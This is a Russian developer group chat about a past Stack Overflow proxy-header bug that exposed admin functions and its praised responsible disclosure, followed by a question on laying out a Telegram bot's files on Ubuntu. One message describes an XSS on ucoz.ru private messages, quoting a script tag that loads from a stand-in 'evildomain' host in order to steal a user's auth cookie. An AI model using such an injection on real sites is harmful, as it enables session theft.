У него какая-то локальная прокся этот заголовок ко всем исходящим запросам добавлять начала.

А на SO на реверс-прокси этот заголовок не фильтровался, или как-то так.

бля, так это с САМИМ SO история была?

Это кто? (ЧТО?)

а

На ucoz.ru в личных сообщениях история переписки засунута на саму страницу в base64.

И туда можно втолкать <script src="http://evildomain.com/"> и украть куку авторизации у собеседника.

Чёт я не смекнул

но я подумал, на SO просто кто-то про что-то выложил рассказ

О, перевод тоже был:
https://habr.com/ru/post/158417/

Из комментариев:
Забавный баг, и еще более забавный заголовок статьи: «Как я взломал StackOverflow? Зашел на него через прокси и там была кнопка админ-панели!».

The next thing that I did was what I felt was the responsible thing to do: I pinged a moderator. In a few short minutes, I was in a private chat with the moderator as well as two developers. We found the cause of the issue in about 10 minutes. They had a workaround in place about 10 minutes later. The full fix took a few hours, but it was quickly done and rolled out. Really, they could not have responded better. I still have the chat log, and let’s just say that those developers deserve every accolade that I can give them. They responded quickly and professionally. And they solved the problem within minutes of me reporting it.

молодцы

утро в чатик всем!

Вопрос: как грамотно/правильно разложить файлы телеграм-бота по файловой структуре? Например в Ubuntu.

То есть, когда и как использовать папки /srv /opt /var/lib или может всё через /usr/local ?

поделитесь мнениями и советами пожалуйста

Какие именно файлы?

есть главный стартовый скрипт, файл базы и подключаемые пакеты/модули, которые импортируются

+ файл конфига бота